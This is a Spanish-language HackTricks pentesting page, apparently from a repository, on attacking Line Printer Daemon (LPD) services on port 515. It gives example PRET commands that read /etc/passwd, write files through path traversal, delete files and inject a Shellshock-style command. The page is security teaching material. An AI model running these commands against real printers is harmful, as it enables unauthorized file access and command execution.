hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md
carlospolop 63bd9641c0 f
2023-06-05 20:33:24 +02:00

4.6 KiB

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

El protocolo Line Printer Daemon (LPD) fue introducido originalmente en Berkeley Unix en los años 80 (posteriormente especificado por RFC1179).
El demonio se ejecuta en el puerto 515/tcp y se puede acceder a él utilizando el comando lpr. Para imprimir, el cliente envía un archivo de control que define el trabajo/usuario y un archivo de datos que contiene los datos reales que se van a imprimir. El tipo de entrada del archivo de datos se puede establecer en el archivo de control eligiendo entre varios formatos de archivo. Sin embargo, depende de la implementación de LPD cómo manejar los datos de impresión. Una implementación popular de LPD para sistemas operativos similares a Unix es LPRng. LPD se puede utilizar como portador para implementar trabajos de impresión maliciosos de PostScript o PJL.

Las herramientas lpdprint y lpdtest están incluidas en PRET. Son una forma minimalista de imprimir datos directamente en una impresora compatible con LPD o descargar/subir/eliminar archivos y más:

lpdprint.py hostname filename
lpdtest.py hostname get /etc/passwd
lpdtest.py hostname put ../../etc/passwd
lpdtest.py hostname rm /some/file/on/printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
lpdtest.py hostname mail lpdtest@mailhost.local

Si quieres aprender más sobre hackear impresoras lee esta página.

Shodan

  • puerto 515
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥